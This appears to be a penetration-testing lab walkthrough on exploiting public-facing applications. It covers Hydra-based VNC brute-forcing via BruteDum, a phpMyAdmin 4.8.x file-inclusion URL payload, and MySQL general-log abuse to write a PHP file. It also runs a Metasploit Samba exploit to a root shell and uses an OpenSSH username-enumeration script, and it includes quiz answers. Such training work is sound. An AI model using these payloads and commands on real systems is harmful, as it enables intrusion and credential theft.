Brute-forcing is the process of discovering weak login credentials and is typically one of the first actions performed during security assessments of public-facing applications. As there are different tools built to aid in brute-forcing for different protocols, it is often needed to have a framework that eases the procedure of launching customized brute-force attacks.
BruteDum is a Python tool that combines service enumeration and brute-forcing tools. It lists the best tool to use for services found, cutting down the time it would take the user to find the right attack technique. It organizes powerful tools for breaking into user accounts on services like SSH, VNC, etc.
To get started, go to the BruteDum directory, which has been preinstalled on the system:
cd Exploiting-Public-Facing-App
BruteDum can not find password lists saved outside the BruteDum folder, so the solution is to add the password list directly to its directory. A password list is already located in the same directory.
To run BruteDum, use the following command:
`python3 brutedum.py
Target Address
The tool first prompts for the victim’s IP address. In this example, use our own machine IP as a target by typing localhost
Once you’ve done so, press Enter, and the program will present the option to run a Nmap scan. It’s a convenient feature that can help you discover other services open on the same machine. Type Y and press Enter to run the Nmap scan. y
The scan results show that 6 ports are open in the machine labeled 1 through 6. The next step is to select a service to crack. Select option 6 and press Enter for VNC cracking. 6
Tool Selection for BruteDum
After scanning VNC, BruteDum lists a few tools for brute forcing. In this case, Hydra is recommended. Hydra is a password-cracking tool that supports several protocols to attack. To use it, type 2 on the terminal and press Enter. 2
Set Username and Password List
When asked for the wordlist, use the wordlist located in Downloads/BruteDumps. Hydra will go through the wordlist and attempt to authenticate to VNC. `Top207-probable-v2.txt
Launch the Attack
The default VNC port is 5900, but some machines may use a non-standard port. Since our target is running VNC on port 5901, press “n” to proceed. `n
Next, enter 5901 to specify the port: `5901
Once the port is set, BruteDum will automatically launch Hydra, a password-cracking tool, to perform a brute-force attack on the VNC credentials.
If the attack succeeds, a valid password will be revealed. Otherwise, it will indicate that no matching credentials were found in this attempt. While this method may not always work, it can be effective in scenarios where the correct password is included in the tested list.
When prompted to continue, press “n” to exit the tool.
If valid credentials are obtained, an attacker can use Remmina, a remote desktop tool for screen sharing and file transfers, to connect to the VNC server and gain initial access to the system.
What is the password that was founded by brute forcing? 123456
PHPMyAdmin 4.8.0 Vulnerability
PHPMyAdmin is a set of open-source, web-based MySQL database management tools.
4.8.0 ~ 4.8.1 versions of the tool are vulnerable to file inclusion in index.php caused by a validation bypass in the vulnerable path checking function Core::checkPageValidity. This vulnerability allows remote adversaries to execute arbitrary PHP code on the machine when authenticated.
Open a browser and visit phpmyadmin.com, which is running a vulnerable PHPMyAdmin version.
http://192.168.1.100/phpmyadmin
After visting the website, a login page appears. PHPMyAdmin is known for weak configurations from its users, so default credentials are often used (admin, admin). Use the default credentials to log in and access the tool’s dashboard.
Disregard any error messages that appear on the webpage.
PHPMyAdmin File Inclusion
Local File Inclusion (LFI) is used to trick the web application into exposing or running files on the webserver. This can lead to remote code execution, Cross-site Scripting (XSS), and information disclosure.
The running version of PHPMyAdmin on this machine is vulnerable to Local File Inclusion. To test this, after the dashboard is accessed, try entering the following link in the URL path:
http://192.168.1.100/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
This payload exploits the target argument by appending a custom file path. In Linux-based operating systems, the ../ connotation lists the content of the parent directory. Adding a few of these special characters allows the attacker to list the contents of the root directory and then traverse to any file of choosing. In this case, the content of the /etc/passwd file is shown. This file contains a list of all machine users.
Executing Getshell Commands
Different getshell methods exist that can exploit this vulnerability, such as changing the path of the written log, writing a one-sentence Trojan horse, etc.
In this example, MySQL logging capabilities will be exploited to create malicious PHP files. More specifically, the files will be created by manipulating two MySQL global variables:
- general log - refers to the log saving status. There are two values (ON/OFF), ON meaning open and OFF meaning closed.
- general log file - refers to the save path of the log.
MySQL 5.0 and above will create log files, modify the log’s global variables and, have read and write permissions to the generated log.
First, check the log status running the below statement in the “SQL” tab and pressing “Go”: `SHOW VARIABLES LIKE ‘general%’ ;
If general_log=ON , the executed SQL statement will appear in the /1e164993aaf5.log file as stated.
However, if the path of general_log_file is changed to for example /1.php , the executed SQL statement will be saved to that file.
To change the general_log variable and set it to ON, execute the following:
`SET GLOBAL general_log= ‘on’
Next, using the following statement, the log file can be changed to 1.php. `SET GLOBAL general_log_file= ‘1.php’
Keep in mind that database errors might appear, however the code is being executed. To confirm that the commands were successful, check the log status running the below statement: `SHOW VARIABLES LIKE ‘general%’ ;
If general_log is ON, and the log file is now 1.php, the commands ran successfully. Keep in mind that this statement will work if the directory path is set correctly corresponding to the default server path where the log files are saved, otherwise, the file can not be generated and will prompt an error.
Now, run the following statement, which will be logged in the new specified file, leading to generating the 1.php file:
select '<?php phpinfo();?>'
After running the statement, from the server-side, 1.php is generated successfully on the PHPMyAdmin server at /var/lib/mysql/1.php.
Samba Vulnerabilities
Samba consists of a suite of applications implementing the SMB protocol. Many operating systems, including Windows, use the SMB protocol for client-server networking. Samba also enables Linux machines to communicate with Windows machines in the network.
Many Samba implementations use outdated versions, providing an easy target for adversaries.
The first step to determine if a vulnerable version is being used by enumerating the target for the version number. Use Nmap to scan the samba machine: `nmap -sC -sV 192.168.1.100
In addition to showing information related to Samba, Nmap also resolves the IP address of the machine.
Based on nmap, which ports are open on Samba Target? 80, 445, 22
Enumerating Samba Version
To get more insights about the Samba version running on the host, use Metasploit’s smb_version module. Metasploit is a penetration framework that contains tools, libraries, and modules that aid in security assessments.
First, open a terminal and launch msfconsole:
After launching the tool, select the module to run using the following syntax: `use auxiliary/scanner/smb/smb_version
The smb_version module is an auxiliary module that aids in initial enumeration. Next, set the IP Address of the target using the following command: `set RHOSTS 192.168.1.100
Lastly, to run the exploit use the following command:
exploit
The console will show the scanning results, revealing the version of Samba running on the target host.
This is crucial information, revealing that the host is running an outdated SAMBA Version, which is vulnerable to remote access. Since this is a well-documented vulnerability, scripts that aid in exploitation can be easily found in exploit databases such as ExploitDB.
Based on the scanner results, what is the version of Samba? Samba 4.3.9 - Ubuntu
Exploiting Samba with Metasploit
After locating the SAMBA version, perform an attack and gain access to the Linux system using Meterpertersession. To do so, run the following command in msfconsole: `use exploit/linux/samba/is_known_pipename
This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. Anonymous access combined with common filesystem locations can be used to exploit this vulnerability automatically.
Next, select the host target for the exploit: `set RHOST 192.168.1.100
Prior to running the exploit, some parameters must be changed. To do so, just execute the following commands in the msfconsole:
set SMB::AlwaysEncrypt false set SMB::ProtocolVersion 1
Finally, run the exploit: `exploit
If the attack is successful, the listener will return a shell from the target machine, confirming that the server has been compromised. Try executing commands like id to verify access. To terminate the connection, press Ctrl+C and exit msfconsole.
To which user did we gain access? root
OpenSSH Enumeration
OpenSSH is a suite of secure networking utilities based on the Secure Shell (SSH) protocol which provides a secured channel over a network in a client server architecture. This scenario will demonstrate a vulnerability that allows remote users to determine valid usernames on a victim system. This vulnerability affects versions of OpenSSH < 7.7.
The exploitation procedure is as follows: Any remote user can craft a request to determine valid usernames on the target system and can then send that request via OpenSSH to the victim machine using Kali Linux.
Check the target’s SSH version to see if the machine is vulnerable to using Nmap:
nmap -sV -p22 192.168.1.102
What version of OpenSSH is the machine running? OpenSSH6.7p1
Creating a Username List for SSH
To build a username list containing default usernames that a machine might use create and open a new text file in /home/kali/Exploiting-Public-Facing-App. `nano usernames.txt
Paste the usernames in the list.
Admin
admin
root
toor
alex
albert
briana
brian
administrator
system
PC-ADMIN
Save the changes and close the editor.
The exploit will use this list to enumerate potential usernames on the target machine. The exploitation script is located in the /home/kali/Exploiting-Public-Facing-App directory, and is called ssh_enum.py.
Running the Enumeration Exploit
Make the exploit file into an executable: `chmod +x ssh_enum.py
Run the script using python to initiate the attack. `python3 ssh_enum.py 192.168.1.102 -w usernames.txt > valid.txt
The -w option of the script specifies the path or the wordlist to use. The result of the scan is saved to the valid.txt file.
To view the generated output from the tool, display the content of the valid.txt file: `cat valid.txt
The attacker can now use Hydra or any brute-forcing tool to compromise the target using this list, then connect to SSH server using the credentials to gain access.
Conclusion
This lab provided a hands-on walkthrough of multiple techniques used to exploit public-facing applications by leveraging weak configurations, outdated software versions, and brute-force attacks. Starting with BruteDum, you explored how to automate brute-force attempts across various protocols. You then escalated your approach by exploiting vulnerabilities in PHPMyAdmin, using Local File Inclusion and MySQL log manipulation to achieve remote code execution.
Next, you focused on Samba vulnerabilities, where outdated versions were enumerated and exploited via Metasploit to gain shell access. Finally, using a crafted username enumeration script, you targeted OpenSSH, laying the groundwork for further brute-force attacks with tools like Hydra.
These exercises highlight the critical importance of patch management, secure configurations, and strong credential hygiene in defending against real-world attacks.